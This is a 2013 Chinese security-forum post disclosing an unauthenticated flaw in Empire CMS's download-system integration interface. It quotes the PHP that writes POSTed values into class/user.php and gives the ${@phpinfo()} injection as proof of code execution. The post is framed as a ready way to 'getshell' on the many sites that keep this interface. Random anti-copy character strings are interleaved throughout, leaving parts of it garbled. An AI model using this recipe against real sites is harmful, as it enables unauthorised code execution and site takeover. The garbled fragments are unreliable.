找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2408|回复: 0
打印 上一主题 下一主题

帝国万能接口漏洞0day

[复制链接]
跳转到指定楼层
楼主
发表于 2013-1-23 09:34:37 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
这是帝国的一套下载系统如图 ps(不需要任何账户和密码,直接写shell) 由于很多站是由于下载要整合discuz等等一些论坛.... 而帝国他又有一个万能接口,如图 而这个接口很多人又不会删除,由此他带来了很大的安全隐患,导致直接getshell,下面分析代码 当我们
4 r6 C; ?' t* U4 z' x4 r. X6 S8 J* H$ A


/ n1 |& p/ r9 p* ^2 v+ b6 w0 W" m' V- o这是帝国的一套下载系统 如图! ?4 R' u% C- R2 m, R
ps(不需要任何账户和密码,直接写shell)


: k* S! e! }& H$ D$ ~* o" h5 \

由于很多站是由于下载要整合discuz 等等一些论坛....
& q# Y3 p6 k' {; F


8 E" @  g' |- O. q/ H- q# [: ^

而帝国他又有一个万能接口,如图


6 ]" D' r0 F4 p7 Y$ n+ Y
9 Q0 }1 E: t2 N+ K" c* O; j7 v" L+ z, ]  e

而这个接口很多人又不会删除,由此他带来了很大的安全隐患,导致直接getshell,下面分析代码, N3 l6 [6 [: n) Z/ U# s( ~
: F  _+ t: h4 Q; C* {2 M
当我们提交的时候,他地址是提交到index.php?install=1&setup=SetConfig

1. if($_GET['install']==1)
2. {
3. @include("../class/connect.php");
4. @include("../class/db_sql.php");
5. @include("../class/functions.php");
6. $link=db_connect();
7. $empire=new mysqlquery();
8. if($setup=="SetConfig")
9. {
10. SetUserCOMConfig($_POST);
11. }
12. elseif($setup=="alter")
13. {
14. InstallUserCOM();
15. }
16. elseif($setup=="update")
17. {
18. UpdateUserCOM();
19. }
20. else
21. {}

复制代码

他这里开始调用一个SetUserCOMConfig的函数了,我们继续跟踪, d- A, o6 @5 ]

5 Z, `) s9 `& E3 t" q; @! r$ o9 H; v在data/fun.php中的15行
. l( m9 v5 r+ `& i0 x
; Z2 ^3 F2 G$ j9 |4 X我们可以看到这个函数

1. function SetUserCOMConfig($add){
2. $filetext=ReadFiletext('data/user.php');
3. if(empty($filetext))
4. {
5. InstallShowMsg('文件 /update/data/user.php 丢失,安装不成功.');
6. }
7. $vr=explode(",",ReturnRepUserVar());
8. $count=count($vr);
9. for($i=0;$i<$count;$i++)
10. {
11. $filetext=str_replace("[!@--".$vr[$i]."--@!]",$add[$vr[$i]],$filetext);
12. }
13. //写入配置文件
14. $fp=@fopen("../class/user.php","w");
15. if(!$fp)
16. {
7 K7 ]% M1 h# ^# R" {' r* x) C) R
17. InstallShowMsg(' /class/user.php 文件权限没有设为0777,安装不成功.');
18. }
19. @fputs($fp,$filetext);
20. @fclose($fp);

复制代码

.....//省略若干# [( G0 |/ v" X7 m% ?0 t' n

0 @' J4 ~" \2 x* O这里的他将$filetext=str_replace("[!@--".$vr[$i]."--@!]",$add[$vr[$i]],$filetext);+ ^/ B1 Y$ ^, U! {5 x" d: Q
6 K! J% }6 i% N$ ]5 a% U* A& S7 j
他将传进来的变量进行了切割,然后赋给了$filetext2 O- H7 \8 X& x  K! A. y. D
) c: F. I3 v3 t( r
然后看下面

1. //写入配置文件
2. $fp=@fopen("../class/user.php","w");
3. if(!$fp)
4. {
5. InstallShowMsg(' /class/user.php 文件权限没有设为0777,安装不成功.');
6. }
7. @fputs($fp,$filetext);

复制代码

打开了一个class/user.php文件,然后将$filetext写入了
9 R* a7 }$ `/ d5 b: U$ x& m% Y
( y. `- o7 y" I" `/ q我们看看写入的结果,随便填一个


7 [1 s4 n. }! J  H+ }  D, @% A0 x# `( j7 ?

% \- l$ b- q8 u  k' u, P/ q: j) m$ a) A1 W
- I$ t" S; J/ g# w; y

' A1 f# U/ z7 |* e# R, @$ ^+ f" X7 h8 D0 Y( ?0 w0 k& t+ Z: h8 p

; l" \, ]& t6 Z' B# L! Q/ H

9 E* h5 I' w5 I" Q3 m; `0 c5 ^3 T5 c

; O3 W! z: M4 W% U' t
/ m4 A5 U6 c' `8 I' B$ e% R2 l
" q. w# N- f) |) q9 @$ _" y0 N" Z9 I8 Y8 h" W6 c" x" j

8 S& {( q: z8 d5 `- }# A, Z
: n' D6 K- y/ C1 B
# d: T& K# L2 ^) m; n' F# J, |# P9 Z7 @$ D, I3 e- U

4 [* Q1 M; t7 J; A/ S  v: s& H0 T. k4 x- ~) ?

# s+ @  m1 ~8 |6 g+ w1 f
: q, L! x$ X  u; ?2 K" t4 p

所以我们淫荡点,写个${@phpinfo()}试试

2 }, G' `' g* v" K9 c* p9 m

然后访问以下class/user.php这个文件# |6 e( P  Y+ v! X+ J0 H& O
日了吧


9 B0 y2 c: a/ d4 H0 G

) G2 A$ Q& n! ~' o: c$ t, R
! ]: u% n0 E. }. [6 L5 g+ c. c( J% \9 R, ?
/ x7 G: {0 ]( n" I8 x9 j% x

* o/ Q3 L/ a' h

9 W5 U& v# m$ n0 G; }

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表